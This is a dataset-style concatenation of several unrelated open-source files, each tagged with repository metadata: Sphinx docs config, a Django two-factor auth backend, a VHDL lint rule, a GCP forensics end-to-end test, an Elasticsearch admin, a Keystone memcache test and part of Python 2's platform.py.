# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'phpmyadmin', u'phpMyAdmin Documentation',
[u'The phpMyAdmin devel team'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'phpMyAdmin', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'phpMyAdmin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'phpMyAdmin'
epub_author = u'The phpMyAdmin devel team'
epub_publisher = u'The phpMyAdmin devel team'
epub_copyright = copyright
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Highlight PHP without starting <?php tag
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True)
| gpl-2.0 | -7,684,980,086,626,668,000 | 30.809211 | 82 | 0.709824 | false |
ptone/django-duo-auth | duo_auth/backends.py | 1 | 1061 | import datetime
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import User
from duo_auth.models import VerificationDetails
class auth_backend(ModelBackend):
supports_object_permissions = False
supports_anonymous_user = False
supports_inactive_user = False
def authenticate(self, username=None, password=None, passcode=None):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
return None
if not user.check_password(password):
return None
try:
verification_details = user.two_factor_details
except VerificationDetails.DoesNotExist:
# for users that don't have verification details available
# log them in regularly
return user
if passcode == verification_details.challenge_passcode:
verification_details.last_verified = datetime.datetime.utcnow()
verification_details.save()
return user
return None
| mit | -7,481,110,555,969,955,000 | 30.205882 | 75 | 0.66918 | false |
jeremiah-c-leary/vhdl-style-guide | vsg/rules/single_space_between_tokens.py | 1 | 1864 |
from vsg import parser
from vsg import rule
from vsg import violation
from vsg.rules import utils as rules_utils
from vsg.vhdlFile import utils
class single_space_between_tokens(rule.Rule):
'''
Checks for a single space between two tokens.
Parameters
----------
name : string
The group the rule belongs to.
identifier : string
unique identifier. Usually in the form of 00N.
left_token : token object
The left token to check for a space between the right token
right_token : token object
The right token to check for a space between the left token
'''
def __init__(self, name, identifier, left_token, right_token):
rule.Rule.__init__(self, name=name, identifier=identifier)
self.solution = None
self.phase = 2
self.left_token = left_token
self.right_token = right_token
def _get_tokens_of_interest(self, oFile):
lToi_a = oFile.get_sequence_of_tokens_matching([self.left_token, parser.whitespace, self.right_token])
lToi_b = oFile.get_sequence_of_tokens_matching([self.left_token, self.right_token])
return utils.combine_two_token_class_lists(lToi_a, lToi_b)
def _analyze(self, lToi):
for oToi in lToi:
lTokens = oToi.get_tokens()
if len(lTokens) == 2:
self.add_violation(violation.New(oToi.get_line_number(), oToi, self.solution))
elif len(lTokens[1].get_value()) != 1:
self.add_violation(violation.New(oToi.get_line_number(), oToi, self.solution))
def _fix_violation(self, oViolation):
lTokens = oViolation.get_tokens()
if isinstance(lTokens[1], parser.whitespace):
lTokens[1].set_value(' ')
else:
rules_utils.insert_whitespace(lTokens, 1)
oViolation.set_tokens(lTokens)
| gpl-3.0 | 8,277,113,610,826,553,000 | 30.59322 | 110 | 0.637876 | false |
log2timeline/dftimewolf | tests/lib/collectors/gcloud_e2e.py | 1 | 10759 | # -*- coding: utf-8 -*-
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""End to end test for the Google Cloud Collector."""
import json
import logging
import os
import time
import unittest
from googleapiclient.errors import HttpError
from libcloudforensics.providers.gcp.internal import project as gcp_project
from libcloudforensics.providers.gcp.internal import compute, common
from dftimewolf import config
from dftimewolf.lib import state
from dftimewolf.lib.collectors import gcloud
from dftimewolf.lib.containers import containers
log = logging.getLogger(__name__)
class EndToEndTest(unittest.TestCase):
"""End to end test on GCP for the gcloud.py collector.
This end-to-end test runs directly on GCP and tests that:
1. The gcloud.py collector connects to the target instance and makes a
snapshot of the boot disk (by default) or of the disk passed in
parameter to the collector's SetUp method (disk_names).
2. A new disk is created from the taken snapshot.
3. If an analysis VM already exists, the module will attach the disk
copy to the VM. Otherwise, it will create a new GCP instance for
analysis purpose and attach the disk copy to it.
To run this test, add your project information to a project_info.json file:
{
"project_id": "xxx", # required
"instance": "xxx", # required
"disk": "xxx", # optional
"zone": "xxx" # required
}
Export a PROJECT_INFO environment variable with the absolute path to your
file: "user@terminal:~$ export PROJECT_INFO='absolute/path/project_info.json'"
"""
def __init__(self, *args, **kwargs):
super(EndToEndTest, self).__init__(*args, **kwargs)
try:
project_info = ReadProjectInfo()
except (OSError, RuntimeError, ValueError) as exception:
self.error_msg = str(exception)
return
self.project_id = project_info['project_id']
self.instance_to_analyse = project_info['instance']
# Optional: test a disk other than the boot disk
self.disk_to_forensic = project_info.get('disk', None)
self.zone = project_info['zone']
self.gcp_client = common.GoogleCloudComputeClient(
project_id=self.project_id)
def setUp(self):
if hasattr(self, 'error_msg'):
raise unittest.SkipTest(self.error_msg)
self.incident_id = 'fake-incident-id'
self.test_state = state.DFTimewolfState(config.Config)
self.gcloud_collector = gcloud.GoogleCloudCollector(self.test_state)
def test_end_to_end_boot_disk(self):
"""End to end test on GCP for the gcloud.py collector.
This end-to-end test runs directly on GCP and tests that:
1. The gcloud.py collector connects to the target instance and makes a
snapshot of the boot disk.
2. A new disk is created from the taken snapshot.
3. If an analysis VM already exists, the module will attach the disk
copy to the VM. Otherwise, it will create a new GCP instance for
analysis purpose and attach the boot disk copy to it.
"""
# Setting up the collector to make a copy of the boot disk only
self.gcloud_collector.SetUp(
self.project_id,
self.project_id,
self.incident_id,
self.zone,
True,
42.0,
'pd-standard',
16,
remote_instance_name=self.instance_to_analyse,
# disk_names=None by default, boot disk will be copied
)
# Attach the boot disk copy to the analysis VM
self.gcloud_collector.Process()
# The forensic instance should be live in the analysis GCP project and
# the disk should be attached
forensics_vms = self.test_state.GetContainers(containers.ForensicsVM)
analysis_vm = forensics_vms[0]
analysis_vm_name = analysis_vm.name
expected_disk_name = analysis_vm.evidence_disk.name
gce_instances_client = self.gcp_client.GceApi().instances()
request = gce_instances_client.get(
project=self.project_id,
zone=self.zone,
instance=analysis_vm_name)
response = request.execute()
self.assertEqual(response['name'], analysis_vm_name)
for disk in response['disks']:
if disk['source'].split("/")[-1] == expected_disk_name:
return
self.fail('Error: could not find the disk {0:s} in instance {1:s}'.format(
expected_disk_name, analysis_vm_name
))
def test_end_to_end_other_disk(self):
"""End to end test on GCP for the gcloud.py collector.
This end-to-end test runs directly on GCP and tests that:
1. The gcloud.py collector connects to the target instance and makes a
snapshot of the disk passed to the 'disk_names' parameter in the
SetUp() method.
2. A new disk is created from the taken snapshot.
3. If an analysis VM already exists, the module will attach the disk
copy to the VM. Otherwise, it will create a new GCP instance for
analysis purpose and attach the boot disk copy to it.
"""
# This should make a copy of the disk specified in 'disk-names'
self.gcloud_collector.SetUp(
self.project_id,
self.project_id,
self.incident_id,
self.zone,
True,
42.0,
'pd-standard',
16,
remote_instance_name=self.instance_to_analyse,
disk_names=self.disk_to_forensic
)
# Attach the disk_to_forensic copy to the analysis VM
self.gcloud_collector.Process()
# The forensic instance should be live in the analysis GCP project and
# the disk should be attached
forensics_vms = self.test_state.GetContainers(containers.ForensicsVM)
analysis_vm = forensics_vms[0]
analysis_vm_name = analysis_vm.name
expected_disk_name = analysis_vm.evidence_disk.name
gce_instances_client = self.gcp_client.GceApi().instances()
request = gce_instances_client.get(
project=self.project_id,
zone=self.zone,
instance=analysis_vm_name)
response = request.execute()
self.assertEqual(response['name'], analysis_vm_name)
for disk in response['disks']:
if disk['source'].split("/")[-1] == expected_disk_name:
return
self.fail('Error: could not find the disk {0:s} in instance {1:s}'.format(
expected_disk_name, analysis_vm_name
))
def tearDown(self):
CleanUp(self.project_id, self.zone, self.gcloud_collector.analysis_vm.name)
def ReadProjectInfo():
"""Read project information to run e2e test.
Returns:
dict: A dict with the project information.
Raises:
OSError: if the file cannot be found, opened or closed.
RuntimeError: if the json file cannot be parsed.
ValueError: if the json file does not have the required properties.
"""
project_info = os.environ.get('PROJECT_INFO')
if project_info is None:
raise OSError('Error: please make sure that you defined the '
'"PROJECT_INFO" environment variable pointing '
'to your project settings.')
try:
json_file = open(project_info)
try:
project_info = json.load(json_file)
except ValueError as exception:
raise RuntimeError('Error: cannot parse JSON file. {0:s}'.format(
str(exception))) from ValueError
json_file.close()
except OSError as exception:
raise OSError('Error: could not open/close file {0:s}: {1:s}'.format(
project_info, str(exception)
)) from OSError
if not all(key in project_info for key in ['project_id', 'instance',
'zone']):
raise ValueError('Error: please make sure that your JSON file '
'has the required entries. The file should '
'contain at least the following: ["project_id", '
'"instance", "zone"].')
return project_info
def CleanUp(project_id, zone, instance_name):
"""Clean up GCP project.
Remove the instance [instance_name] in the GCP project [project_id] and its
disks that were created as part of the end to end test.
Attributes:
project_id (str): the project id of the GCP project.
zone (str): the zone for the project.
instance_name (str): the name of the analysis VM to remove.
"""
gcp_client = common.GoogleCloudComputeClient(project_id=project_id)
project = gcp_project.GoogleCloudProject(project_id, zone)
disks = compute.GoogleComputeInstance(
project.project_id, zone, instance_name).ListDisks()
# delete the created forensics VMs
log.info('Deleting analysis instance: {0:s}.'.format(instance_name))
gce_instances_client = gcp_client.GceApi().instances()
request = gce_instances_client.delete(
project=project.project_id,
zone=project.default_zone,
instance=instance_name
)
try:
request.execute()
except HttpError:
# GceOperation triggers a while(True) loop that checks on the
# operation ID. Sometimes it loops one more time right when the
# operation has finished and thus the associated ID doesn't exists
# anymore, throwing an HttpError. We can ignore this.
pass
log.info('Instance {0:s} successfully deleted.'.format(instance_name))
# delete the copied disks
# we ignore the disk that was created for the analysis VM (disks[0]) as
# it is deleted in the previous operation
gce_disks_client = gcp_client.GceApi().disks()
for disk in list(disks.keys())[1:]:
log.info('Deleting disk: {0:s}.'.format(disk))
while True:
try:
request = gce_disks_client.delete(
project=project.project_id,
zone=project.default_zone,
disk=disk
)
request.execute()
break
except HttpError as exception:
# GceApi() will throw a 400 error until the analysis VM deletion is
# correctly propagated. When the disk is finally deleted, it will
# throw a 404 not found if it looped again after deletion.
if exception.resp.status == 404:
break
if exception.resp.status != 400:
log.warning('Could not delete the disk {0:s}: {1:s}'.format(
disk, str(exception)
))
# Throttle the requests to one every 10 seconds
time.sleep(10)
log.info('Disk {0:s} successfully deleted.'.format(
disk))
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -8,741,836,277,264,749,000 | 35.471186 | 80 | 0.67404 | false |
yunojuno/elasticsearch-django | elasticsearch_django/admin.py | 1 | 3501 | import logging
import simplejson as json # simplejson supports Decimal serialization
from django.contrib import admin
from django.template.defaultfilters import truncatechars, truncatewords
from django.utils.safestring import mark_safe
from .models import SearchQuery
logger = logging.getLogger(__name__)
def pprint(data: dict) -> str:
"""
Return an indented HTML pretty-print version of JSON.
Take the event_payload JSON, indent it, order the keys and then
present it as a <code> block. That's about as good as we can get
until someone builds a custom syntax function.
"""
pretty = json.dumps(data, sort_keys=True, indent=4, separators=(",", ": "))
html = pretty.replace(" ", " ").replace("\n", "<br>")
return mark_safe("<code>%s</code>" % html)
class SearchQueryAdmin(admin.ModelAdmin):
list_display = (
"id",
"user",
"search_terms_display",
"total_hits_display",
"returned_",
"min_",
"max_",
"reference",
"executed_at",
)
list_filter = ("index", "query_type")
search_fields = ("search_terms", "user__first_name", "user__last_name", "reference")
# excluding because we are using a pretty version instead
exclude = ("hits", "aggregations", "query", "page", "total_hits_")
readonly_fields = (
"user",
"index",
"search_terms",
"query_type",
"total_hits",
"total_hits_relation",
"returned_",
"min_",
"max_",
"duration",
"query_",
"hits_",
"aggregations_",
"executed_at",
)
def search_terms_display(self, instance: SearchQuery) -> str:
"""Return truncated version of search_terms."""
raw = instance.search_terms
# take first five words, and further truncate to 50 chars if necessary
return truncatechars(truncatewords(raw, 5), 50)
def query_(self, instance: SearchQuery) -> str:
"""Return pretty version of query JSON."""
return pprint(instance.query)
def max_(self, instance: SearchQuery) -> str:
"""Return pretty version of max_score."""
return "-" if instance.page_size == 0 else str(instance.max_score)
max_.short_description = "Max score" # type: ignore
def min_(self, instance: SearchQuery) -> str:
"""Return pretty version of min_score."""
return "-" if instance.page_size == 0 else str(instance.min_score)
min_.short_description = "Min score" # type: ignore
def total_hits_display(self, instance: SearchQuery) -> str:
"""Return total hit count, annotated if lower bound."""
if instance.total_hits_relation == SearchQuery.TotalHitsRelation.ESTIMATE:
return f"{instance.total_hits}*"
return f"{instance.total_hits}"
def returned_(self, instance: SearchQuery) -> str:
"""Return number of hits returned in the page."""
if instance.page_size == 0:
return "-"
return "%i - %i" % (instance.page_from, instance.page_to)
returned_.short_description = "Page returned" # type: ignore
def hits_(self, instance: SearchQuery) -> str:
"""Return pretty version of hits JSON."""
return pprint(instance.hits)
def aggregations_(self, instance: SearchQuery) -> str:
"""Return pretty version of aggregations JSON."""
return pprint(instance.aggregations)
admin.site.register(SearchQuery, SearchQueryAdmin)
| mit | -1,682,509,719,301,585,000 | 32.028302 | 88 | 0.619823 | false |
sileht/deb-openstack-keystone | tests/test_backend_memcache.py | 1 | 2348 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import time
import uuid
import memcache
from keystone import exception
from keystone import test
from keystone.token.backends import memcache as token_memcache
import test_backend
class MemcacheClient(object):
"""Replicates a tiny subset of memcached client interface."""
def __init__(self, *args, **kwargs):
"""Ignores the passed in args."""
self.cache = {}
def check_key(self, key):
if not isinstance(key, str):
raise memcache.Client.MemcachedStringEncodingError()
def get(self, key):
"""Retrieves the value for a key or None."""
self.check_key(key)
obj = self.cache.get(key)
now = time.mktime(datetime.datetime.utcnow().timetuple())
if obj and (obj[1] == 0 or obj[1] > now):
return obj[0]
else:
raise exception.TokenNotFound(token_id=key)
def set(self, key, value, time=0):
"""Sets the value for a key."""
self.check_key(key)
self.cache[key] = (value, time)
return True
def delete(self, key):
self.check_key(key)
try:
del self.cache[key]
except KeyError:
#NOTE(bcwaldon): python-memcached always returns the same value
pass
class MemcacheToken(test.TestCase, test_backend.TokenTests):
def setUp(self):
super(MemcacheToken, self).setUp()
fake_client = MemcacheClient()
self.token_api = token_memcache.Token(client=fake_client)
def test_get_unicode(self):
token_id = unicode(uuid.uuid4().hex)
data = {'id': token_id, 'a': 'b'}
self.token_api.create_token(token_id, data)
self.token_api.get_token(token_id)
| apache-2.0 | -7,747,823,600,834,229,000 | 29.894737 | 75 | 0.654174 | false |
kubaszostak/gdal-dragndrop | osgeo/apps/Python27/Lib/platform.py | 1 | 53234 | #!/usr/bin/env python
""" This module tries to retrieve as much platform-identifying data as
possible. It makes this information available via function APIs.
If called from the command line, it prints the platform
information concatenated as single string to stdout. The output
format is useable as part of a filename.
"""
# This module is maintained by Marc-Andre Lemburg <[email protected]>.
# If you find problems, please submit bug reports/patches via the
# Python bug tracker (http://bugs.python.org) and assign them to "lemburg".
#
# Note: Please keep this module compatible to Python 1.5.2.
#
# Still needed:
# * more support for WinCE
# * support for MS-DOS (PythonDX ?)
# * support for Amiga and other still unsupported platforms running Python
# * support for additional Linux distributions
#
# Many thanks to all those who helped adding platform-specific
# checks (in no particular order):
#
# Charles G Waldman, David Arnold, Gordon McMillan, Ben Darnell,
# Jeff Bauer, Cliff Crawford, Ivan Van Laningham, Josef
# Betancourt, Randall Hopper, Karl Putland, John Farrell, Greg
# Andruk, Just van Rossum, Thomas Heller, Mark R. Levinson, Mark
# Hammond, Bill Tutt, Hans Nowak, Uwe Zessin (OpenVMS support),
# Colin Kong, Trent Mick, Guido van Rossum, Anthony Baxter, Steve
# Dower
#
# History:
#
# <see CVS and SVN checkin messages for history>
#
# 1.0.8 - changed Windows support to read version from kernel32.dll
# 1.0.7 - added DEV_NULL
# 1.0.6 - added linux_distribution()
# 1.0.5 - fixed Java support to allow running the module on Jython
# 1.0.4 - added IronPython support
# 1.0.3 - added normalization of Windows system name
# 1.0.2 - added more Windows support
# 1.0.1 - reformatted to make doc.py happy
# 1.0.0 - reformatted a bit and checked into Python CVS
# 0.8.0 - added sys.version parser and various new access
# APIs (python_version(), python_compiler(), etc.)
# 0.7.2 - fixed architecture() to use sizeof(pointer) where available
# 0.7.1 - added support for Caldera OpenLinux
# 0.7.0 - some fixes for WinCE; untabified the source file
# 0.6.2 - support for OpenVMS - requires version 1.5.2-V006 or higher and
# vms_lib.getsyi() configured
# 0.6.1 - added code to prevent 'uname -p' on platforms which are
# known not to support it
# 0.6.0 - fixed win32_ver() to hopefully work on Win95,98,NT and Win2k;
# did some cleanup of the interfaces - some APIs have changed
# 0.5.5 - fixed another type in the MacOS code... should have
# used more coffee today ;-)
# 0.5.4 - fixed a few typos in the MacOS code
# 0.5.3 - added experimental MacOS support; added better popen()
# workarounds in _syscmd_ver() -- still not 100% elegant
# though
# 0.5.2 - fixed uname() to return '' instead of 'unknown' in all
# return values (the system uname command tends to return
# 'unknown' instead of just leaving the field empty)
# 0.5.1 - included code for slackware dist; added exception handlers
# to cover up situations where platforms don't have os.popen
# (e.g. Mac) or fail on socket.gethostname(); fixed libc
# detection RE
# 0.5.0 - changed the API names referring to system commands to *syscmd*;
# added java_ver(); made syscmd_ver() a private
# API (was system_ver() in previous versions) -- use uname()
# instead; extended the win32_ver() to also return processor
# type information
# 0.4.0 - added win32_ver() and modified the platform() output for WinXX
# 0.3.4 - fixed a bug in _follow_symlinks()
# 0.3.3 - fixed popen() and "file" command invokation bugs
# 0.3.2 - added architecture() API and support for it in platform()
# 0.3.1 - fixed syscmd_ver() RE to support Windows NT
# 0.3.0 - added system alias support
# 0.2.3 - removed 'wince' again... oh well.
# 0.2.2 - added 'wince' to syscmd_ver() supported platforms
# 0.2.1 - added cache logic and changed the platform string format
# 0.2.0 - changed the API to use functions instead of module globals
# since some action take too long to be run on module import
# 0.1.0 - first release
#
# You can always get the latest version of this module at:
#
# http://www.egenix.com/files/python/platform.py
#
# If that URL should fail, try contacting the author.
__copyright__ = """
Copyright (c) 1999-2000, Marc-Andre Lemburg; mailto:[email protected]
Copyright (c) 2000-2010, eGenix.com Software GmbH; mailto:[email protected]
Permission to use, copy, modify, and distribute this software and its
documentation for any purpose and without fee or royalty is hereby granted,
provided that the above copyright notice appear in all copies and that
both that copyright notice and this permission notice appear in
supporting documentation or portions thereof, including modifications,
that you make.
EGENIX.COM SOFTWARE GMBH DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
"""
__version__ = '1.0.7'
import sys,string,os,re
### Globals & Constants
# Determine the platform's /dev/null device
try:
DEV_NULL = os.devnull
except AttributeError:
# os.devnull was added in Python 2.4, so emulate it for earlier
# Python versions
if sys.platform in ('dos','win32','win16','os2'):
# Use the old CP/M NUL as device name
DEV_NULL = 'NUL'
else:
# Standard Unix uses /dev/null
DEV_NULL = '/dev/null'
### Platform specific APIs
_libc_search = re.compile(r'(__libc_init)'
'|'
'(GLIBC_([0-9.]+))'
'|'
'(libc(_\w+)?\.so(?:\.(\d[0-9.]*))?)')
def libc_ver(executable=sys.executable,lib='',version='',
chunksize=2048):
""" Tries to determine the libc version that the file executable
(which defaults to the Python interpreter) is linked against.
Returns a tuple of strings (lib,version) which default to the
given parameters in case the lookup fails.
Note that the function has intimate knowledge of how different
libc versions add symbols to the executable and thus is probably
only useable for executables compiled using gcc.
The file is read and scanned in chunks of chunksize bytes.
"""
if hasattr(os.path, 'realpath'):
# Python 2.2 introduced os.path.realpath(); it is used
# here to work around problems with Cygwin not being
# able to open symlinks for reading
executable = os.path.realpath(executable)
f = open(executable,'rb')
binary = f.read(chunksize)
pos = 0
while 1:
m = _libc_search.search(binary,pos)
if not m:
binary = f.read(chunksize)
if not binary:
break
pos = 0
continue
libcinit,glibc,glibcversion,so,threads,soversion = m.groups()
if libcinit and not lib:
lib = 'libc'
elif glibc:
if lib != 'glibc':
lib = 'glibc'
version = glibcversion
elif glibcversion > version:
version = glibcversion
elif so:
if lib != 'glibc':
lib = 'libc'
if soversion and soversion > version:
version = soversion
if threads and version[-len(threads):] != threads:
version = version + threads
pos = m.end()
f.close()
return lib,version
def _dist_try_harder(distname,version,id):
""" Tries some special tricks to get the distribution
information in case the default method fails.
Currently supports older SuSE Linux, Caldera OpenLinux and
Slackware Linux distributions.
"""
if os.path.exists('/var/adm/inst-log/info'):
# SuSE Linux stores distribution information in that file
info = open('/var/adm/inst-log/info').readlines()
distname = 'SuSE'
for line in info:
tv = string.split(line)
if len(tv) == 2:
tag,value = tv
else:
continue
if tag == 'MIN_DIST_VERSION':
version = string.strip(value)
elif tag == 'DIST_IDENT':
values = string.split(value,'-')
id = values[2]
return distname,version,id
if os.path.exists('/etc/.installed'):
# Caldera OpenLinux has some infos in that file (thanks to Colin Kong)
info = open('/etc/.installed').readlines()
for line in info:
pkg = string.split(line,'-')
if len(pkg) >= 2 and pkg[0] == 'OpenLinux':
# XXX does Caldera support non Intel platforms ? If yes,
# where can we find the needed id ?
return 'OpenLinux',pkg[1],id
if os.path.isdir('/usr/lib/setup'):
# Check for slackware version tag file (thanks to Greg Andruk)
verfiles = os.listdir('/usr/lib/setup')
for n in range(len(verfiles)-1, -1, -1):
if verfiles[n][:14] != 'slack-version-':
del verfiles[n]
if verfiles:
verfiles.sort()
distname = 'slackware'
version = verfiles[-1][14:]
return distname,version,id
return distname,version,id
_release_filename = re.compile(r'(\w+)[-_](release|version)')
_lsb_release_version = re.compile(r'(.+)'
' release '
'([\d.]+)'
'[^(]*(?:\((.+)\))?')
_release_version = re.compile(r'([^0-9]+)'
'(?: release )?'
'([\d.]+)'
'[^(]*(?:\((.+)\))?')
# See also http://www.novell.com/coolsolutions/feature/11251.html
# and http://linuxmafia.com/faq/Admin/release-files.html
# and http://data.linux-ntfs.org/rpm/whichrpm
# and http://www.die.net/doc/linux/man/man1/lsb_release.1.html
_supported_dists = (
'SuSE', 'debian', 'fedora', 'redhat', 'centos',
'mandrake', 'mandriva', 'rocks', 'slackware', 'yellowdog', 'gentoo',
'UnitedLinux', 'turbolinux')
def _parse_release_file(firstline):
# Default to empty 'version' and 'id' strings. Both defaults are used
# when 'firstline' is empty. 'id' defaults to empty when an id can not
# be deduced.
version = ''
id = ''
# Parse the first line
m = _lsb_release_version.match(firstline)
if m is not None:
# LSB format: "distro release x.x (codename)"
return tuple(m.groups())
# Pre-LSB format: "distro x.x (codename)"
m = _release_version.match(firstline)
if m is not None:
return tuple(m.groups())
# Unknown format... take the first two words
l = string.split(string.strip(firstline))
if l:
version = l[0]
if len(l) > 1:
id = l[1]
return '', version, id
def linux_distribution(distname='', version='', id='',
supported_dists=_supported_dists,
full_distribution_name=1):
""" Tries to determine the name of the Linux OS distribution name.
The function first looks for a distribution release file in
/etc and then reverts to _dist_try_harder() in case no
suitable files are found.
supported_dists may be given to define the set of Linux
distributions to look for. It defaults to a list of currently
supported Linux distributions identified by their release file
name.
If full_distribution_name is true (default), the full
distribution read from the OS is returned. Otherwise the short
name taken from supported_dists is used.
Returns a tuple (distname,version,id) which default to the
args given as parameters.
"""
try:
etc = os.listdir('/etc')
except os.error:
# Probably not a Unix system
return distname,version,id
etc.sort()
for file in etc:
m = _release_filename.match(file)
if m is not None:
_distname,dummy = m.groups()
if _distname in supported_dists:
distname = _distname
break
else:
return _dist_try_harder(distname,version,id)
# Read the first line
f = open('/etc/'+file, 'r')
firstline = f.readline()
f.close()
_distname, _version, _id = _parse_release_file(firstline)
if _distname and full_distribution_name:
distname = _distname
if _version:
version = _version
if _id:
id = _id
return distname, version, id
# To maintain backwards compatibility:
def dist(distname='',version='',id='',
supported_dists=_supported_dists):
""" Tries to determine the name of the Linux OS distribution name.
The function first looks for a distribution release file in
/etc and then reverts to _dist_try_harder() in case no
suitable files are found.
Returns a tuple (distname,version,id) which default to the
args given as parameters.
"""
return linux_distribution(distname, version, id,
supported_dists=supported_dists,
full_distribution_name=0)
class _popen:
""" Fairly portable (alternative) popen implementation.
This is mostly needed in case os.popen() is not available, or
doesn't work as advertised, e.g. in Win9X GUI programs like
PythonWin or IDLE.
Writing to the pipe is currently not supported.
"""
tmpfile = ''
pipe = None
bufsize = None
mode = 'r'
def __init__(self,cmd,mode='r',bufsize=None):
if mode != 'r':
raise ValueError,'popen()-emulation only supports read mode'
import tempfile
self.tmpfile = tmpfile = tempfile.mktemp()
os.system(cmd + ' > %s' % tmpfile)
self.pipe = open(tmpfile,'rb')
self.bufsize = bufsize
self.mode = mode
def read(self):
return self.pipe.read()
def readlines(self):
if self.bufsize is not None:
return self.pipe.readlines()
def close(self,
remove=os.unlink,error=os.error):
if self.pipe:
rc = self.pipe.close()
else:
rc = 255
if self.tmpfile:
try:
remove(self.tmpfile)
except error:
pass
return rc
# Alias
__del__ = close
def popen(cmd, mode='r', bufsize=None):
""" Portable popen() interface.
"""
# Find a working popen implementation preferring win32pipe.popen
# over os.popen over _popen
popen = None
if os.environ.get('OS','') == 'Windows_NT':
# On NT win32pipe should work; on Win9x it hangs due to bugs
# in the MS C lib (see MS KnowledgeBase article Q150956)
try:
import win32pipe
except ImportError:
pass
else:
popen = win32pipe.popen
if popen is None:
if hasattr(os,'popen'):
popen = os.popen
# Check whether it works... it doesn't in GUI programs
# on Windows platforms
if sys.platform == 'win32': # XXX Others too ?
try:
popen('')
except os.error:
popen = _popen
else:
popen = _popen
if bufsize is None:
return popen(cmd,mode)
else:
return popen(cmd,mode,bufsize)
def _norm_version(version, build=''):
""" Normalize the version and build strings and return a single
version string using the format major.minor.build (or patchlevel).
"""
l = string.split(version,'.')
if build:
l.append(build)
try:
ints = map(int,l)
except ValueError:
strings = l
else:
strings = map(str,ints)
version = string.join(strings[:3],'.')
return version
_ver_output = re.compile(r'(?:([\w ]+) ([\w.]+) '
'.*'
'\[.* ([\d.]+)\])')
# Examples of VER command output:
#
# Windows 2000: Microsoft Windows 2000 [Version 5.00.2195]
# Windows XP: Microsoft Windows XP [Version 5.1.2600]
# Windows Vista: Microsoft Windows [Version 6.0.6002]
#
# Note that the "Version" string gets localized on different
# Windows versions.
def _syscmd_ver(system='', release='', version='',
supported_platforms=('win32','win16','dos','os2')):
""" Tries to figure out the OS version used and returns
a tuple (system,release,version).
It uses the "ver" shell command for this which is known
to exists on Windows, DOS and OS/2. XXX Others too ?
In case this fails, the given parameters are used as
defaults.
"""
if sys.platform not in supported_platforms:
return system,release,version
# Try some common cmd strings
for cmd in ('ver','command /c ver','cmd /c ver'):
try:
pipe = popen(cmd)
info = pipe.read()
if pipe.close():
raise os.error,'command failed'
# XXX How can I suppress shell errors from being written
# to stderr ?
except os.error,why:
#print 'Command %s failed: %s' % (cmd,why)
continue
except IOError,why:
#print 'Command %s failed: %s' % (cmd,why)
continue
else:
break
else:
return system,release,version
# Parse the output
info = string.strip(info)
m = _ver_output.match(info)
if m is not None:
system,release,version = m.groups()
# Strip trailing dots from version and release
if release[-1] == '.':
release = release[:-1]
if version[-1] == '.':
version = version[:-1]
# Normalize the version and build strings (eliminating additional
# zeros)
version = _norm_version(version)
return system,release,version
_WIN32_CLIENT_RELEASES = {
(5, 0): "2000",
(5, 1): "XP",
# Strictly, 5.2 client is XP 64-bit, but platform.py historically
# has always called it 2003 Server
(5, 2): "2003Server",
(5, None): "post2003",
(6, 0): "Vista",
(6, 1): "7",
(6, 2): "8",
(6, 3): "8.1",
(6, None): "post8.1",
(10, 0): "10",
(10, None): "post10",
}
# Server release name lookup will default to client names if necessary
_WIN32_SERVER_RELEASES = {
(5, 2): "2003Server",
(6, 0): "2008Server",
(6, 1): "2008ServerR2",
(6, 2): "2012Server",
